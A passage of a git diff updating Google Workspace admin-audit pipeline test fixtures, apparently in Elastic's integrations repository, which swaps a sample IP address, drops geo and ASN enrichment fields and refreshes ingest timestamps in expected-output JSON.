"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_CAA_ERROR_MESSAGE", "id": "1", @@ -1169,7 +917,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1193,35 +941,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351399300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079615100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_CAA_APP_ASSIGNMENTS", "id": "1", @@ -1251,7 +981,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1275,35 +1005,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351401Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079621300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNTRUST_DOMAIN_OWNED_OAUTH2_APPS", "id": "1", @@ -1333,7 +1045,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1357,35 +1069,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351402800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079627800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "TRUST_DOMAIN_OWNED_OAUTH2_APPS", "id": "1", @@ -1407,31 +1101,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1445,7 +1121,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1469,8 +1145,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:25.351404500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079634100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY", "id": "1", @@ -1508,7 +1184,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1532,35 +1208,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351406400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:53.079640400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "ENFORCE_STRONG_AUTHENTICATION", "id": "1", @@ -1591,7 +1249,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1613,35 +1271,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351408200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079646700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS", "id": "1", @@ -1664,31 +1304,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1702,7 +1324,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1726,8 +1348,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:25.351411200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079652900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED", "id": "1", @@ -1765,7 +1387,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1789,35 +1411,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351413200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079659200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "SESSION_CONTROL_SETTINGS_CHANGE", "id": "1", @@ -1848,7 +1452,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1870,35 +1474,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351414900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079665Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_SESSION_LENGTH", "id": "1", @@ -1929,7 +1515,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1955,35 +1541,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351416700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079670600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNBLOCK_ON_DEVICE_ACCESS", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log index ff07d024c4c..f720ee9d408 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log @@ -1,5 +1,5 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"ADD_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"DELETE_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES","parameters":[{"name":"SERVICE_NAME","value":"service"},{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"VIEW_SITE_DETAILS","parameters":[{"name":"SITE_NAME","value":"site"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"ADD_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"DELETE_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES","parameters":[{"name":"SERVICE_NAME","value":"service"},{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"VIEW_SITE_DETAILS","parameters":[{"name":"SITE_NAME","value":"site"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json index 9de2c7d4f0c..502bc0e559d 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json @@ -2,31 +2,13 @@ "expected": [ { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", 